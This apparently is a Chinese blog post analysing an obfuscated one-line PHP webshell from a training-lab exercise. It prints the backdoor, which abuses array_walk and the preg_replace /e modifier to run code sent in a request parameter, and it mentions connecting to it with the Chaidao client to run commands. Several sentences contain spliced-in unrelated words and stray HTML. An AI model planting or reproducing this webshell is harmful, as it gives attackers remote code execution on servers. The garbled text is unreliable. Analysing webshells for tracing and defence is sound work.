webshell代码分析溯源(九)
一、一句话溶解度定义变形马样本
<?php $e = $_request[‘e’];$arr = array($_post[‘pass’] => ‘|.*|e’,);array_walk($arr, $e, ”);?>
二、代码分析
1、调整代码格式
2、分析代码
1、首先使用request方法接收url中拆迁条例的e参数的值,创建arr数组,然后array_walk对数组$arr中的每个元素应用用户自定义函数$e
注:,arrawta排名y_walk() 函数对数组中的每个元素应用用户自定义函数。在函数中,数组的键名和键值是参数。
参考: https://www.w3school.com.cn/php/func_array_walk.asp
2、此时看到’|.*|e’,首先想到的是正则表达式,使用preg_replace()函数, preg_replace() 将 replacement 参数当作 php 代码,正则意思为匹配模式出现/e修正符,后面的replacement就会被当作php代码执行, 这样就可以把 $_post[‘pass’]构造运行,此时一句话木马就变成了<?php preg_re汽车营销专业place(“|.*|e”, $_post[‘pass’],’’);?>
三、漏洞环境搭建
1、这里使用在线学习平台墨者学院中的实验环境(webshell代码分析溯源(第8题)),地址: /d/file/titlepic/ppspan style="font-size: 15px">2、代码环境,下载代码
3、分析(上面已经分析过了)
4、使用菜刀连接
5、执行一些命令
本文发布于:2023-04-07 19:24:52,感谢您对本站的认可!
本文链接:https://www.wtabcd.cn/fanwen/zuowen/e10501cb9ec710bf1c08fbb86378588a.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文word下载地址:WebShell代码分析溯源(九).doc
本文 PDF 下载地址:WebShell代码分析溯源(九).pdf
留言与评论(共有 0 条评论) |